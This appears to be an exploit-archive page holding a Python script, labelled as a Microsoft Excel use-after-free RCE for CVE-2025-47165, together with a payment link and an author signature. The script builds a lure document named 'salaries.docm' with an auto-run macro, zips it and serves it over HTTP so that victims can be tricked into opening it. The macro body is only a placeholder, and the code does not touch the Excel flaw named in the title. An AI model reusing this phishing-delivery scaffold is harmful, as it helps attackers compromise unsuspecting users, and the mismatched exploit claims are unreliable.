97a1ee1350
9 changes to exploits/shellcodes/ghdb OneTrust SDK 6.33.0 - Denial Of Service (DoS) McAfee Agent 5.7.6 - Insecure Storage of Sensitive Information PX4 Military UAV Autopilot 1.12.3 - Denial of Service (DoS) Pterodactyl Panel 1.11.11 - Remote Code Execution (RCE) Sitecore 10.4 - Remote Code Execution (RCE) Social Warfare WordPress Plugin 3.5.2 - Remote Code Execution (RCE) freeSSHd 1.0.9 - Denial of Service (DoS) Microsoft Excel 2024 Use after free - Remote Code Execution (RCE)
156 lines
No EOL
4.5 KiB
Python
Executable file
156 lines
No EOL
4.5 KiB
Python
Executable file
# Exploit Title: Microsoft Excel 2024 Use after free - Remote Code Execution (RCE)
|
|
# Author: nu11secur1ty
|
|
# Date: 06/24/2025
|
|
# Vendor: Microsoft
|
|
# Software: https://www.microsoft.com/en/microsoft-365/excel?market=af
|
|
# Reference:
|
|
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47165
|
|
# CVE: CVE-2025-47165
|
|
# Versions: Microsoft Office LTSC 2024 , Microsoft Office LTSC 2021,
|
|
Microsoft 365 Apps for Enterprise
|
|
|
|
# Description:
|
|
The attacker can trick any user into opening and executing their code by
|
|
sending a malicious DOCM file via email or a streaming server. After the
|
|
execution of the victim, his machine can be infected or even worse than
|
|
ever; this could be the end of his Windows machine! WARNING: AMPOTATE THE
|
|
MACROS OPTIONS FROM YOUR OFFICE 365!!!
|
|
|
|
#!/usr/bin/python
|
|
|
|
import os
|
|
import sys
|
|
import pythoncom
|
|
from win32com.client import Dispatch
|
|
import http.server
|
|
import socketserver
|
|
import socket
|
|
import threading
|
|
import zipfile
|
|
|
|
PORT = 8000
|
|
DOCM_FILENAME = "salaries.docm"
|
|
ZIP_FILENAME = "salaries.zip"
|
|
DIRECTORY = "."
|
|
|
|
def create_docm_with_macro(filename=DOCM_FILENAME):
|
|
pythoncom.CoInitialize()
|
|
word = Dispatch("Word.Application")
|
|
word.Visible = False
|
|
|
|
try:
|
|
doc = word.Documents.Add()
|
|
vb_project = doc.VBProject
|
|
vb_component = vb_project.VBComponents("ThisDocument")
|
|
|
|
macro_code = '''
|
|
Sub AutoOpen()
|
|
//YOUR EXPLOIT HERE
|
|
// All OF YPU PLEASE WATCH THE DEMO VIDEO
|
|
// Best Regards to packetstorm.news and OFFSEC
|
|
End Sub
|
|
'''
|
|
|
|
vb_component.CodeModule.AddFromString(macro_code)
|
|
|
|
doc.SaveAs(os.path.abspath(filename), FileFormat=13)
|
|
print(f"[+] Macro-enabled Word document created: {filename}")
|
|
|
|
except Exception as e:
|
|
print(f"[!] Error creating document: {e}")
|
|
finally:
|
|
doc.Close(False)
|
|
word.Quit()
|
|
pythoncom.CoUninitialize()
|
|
|
|
def zip_docm(docm_path, zip_path):
|
|
with zipfile.ZipFile(zip_path, 'w', compression=zipfile.ZIP_DEFLATED)
|
|
as zipf:
|
|
zipf.write(docm_path, arcname=os.path.basename(docm_path))
|
|
print(f"[+] Created ZIP archive: {zip_path}")
|
|
|
|
def get_local_ip():
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
|
try:
|
|
s.connect(("8.8.8.8", 80))
|
|
ip = s.getsockname()[0]
|
|
except Exception:
|
|
ip = "127.0.0.1"
|
|
finally:
|
|
s.close()
|
|
return ip
|
|
|
|
class Handler(http.server.SimpleHTTPRequestHandler):
|
|
def __init__(self, *args, **kwargs):
|
|
super().__init__(*args, directory=DIRECTORY, **kwargs)
|
|
|
|
def run_server():
|
|
ip = get_local_ip()
|
|
print(f"[+] Starting HTTP server on http://{ip}:{PORT}")
|
|
print(f"[+] Place your macro docm and zip files in this directory to
|
|
serve them.")
|
|
print(f"[+] Access the ZIP file at: http://{ip}:{PORT}/{ZIP_FILENAME}")
|
|
with socketserver.TCPServer(("", PORT), Handler) as httpd:
|
|
print("[+] Server running, press Ctrl+C to stop")
|
|
httpd.serve_forever()
|
|
|
|
if __name__ == "__main__":
|
|
if os.name != "nt":
|
|
print("[!] This script only runs on Windows with MS Word
|
|
installed.")
|
|
sys.exit(1)
|
|
|
|
print("[*] Creating the macro-enabled document...")
|
|
create_docm_with_macro(DOCM_FILENAME)
|
|
|
|
print("[*] Creating ZIP archive of the document...")
|
|
zip_docm(DOCM_FILENAME, ZIP_FILENAME)
|
|
|
|
print("[*] Starting HTTP server in background thread...")
|
|
server_thread = threading.Thread(target=run_server, daemon=True)
|
|
server_thread.start()
|
|
|
|
try:
|
|
while True:
|
|
pass # Keep main thread alive
|
|
except KeyboardInterrupt:
|
|
print("\n[!] Server stopped by user.")
|
|
|
|
|
|
```
|
|
|
|
# Reproduce:
|
|
[href](https://www.youtube.com/watch?v=CSb76-OG-Tg)
|
|
|
|
# Buy an exploit only:
|
|
[href](https://satoshidisk.com/pay/COiBVA)
|
|
|
|
# Time spent:
|
|
01:37:00
|
|
|
|
|
|
--
|
|
System Administrator - Infrastructure Engineer
|
|
Penetration Testing Engineer
|
|
Exploit developer at https://packetstormsecurity.com/
|
|
https://cve.mitre.org/index.html
|
|
https://cxsecurity.com/ and https://www.exploit-db.com/
|
|
0day Exploit DataBase https://0day.today/
|
|
home page: https://www.nu11secur1ty.com/
|
|
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
|
|
nu11secur1ty <http://nu11secur1ty.com/>
|
|
|
|
|
|
|
|
|
|
--
|
|
|
|
System Administrator - Infrastructure Engineer
|
|
Penetration Testing Engineer
|
|
Exploit developer at https://packetstorm.news/
|
|
https://cve.mitre.org/index.html
|
|
https://cxsecurity.com/ and https://www.exploit-db.com/
|
|
0day Exploit DataBase https://0day.today/
|
|
home page: https://www.nu11secur1ty.com/
|
|
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
|
|
nu11secur1ty <http://nu11secur1ty.com/> |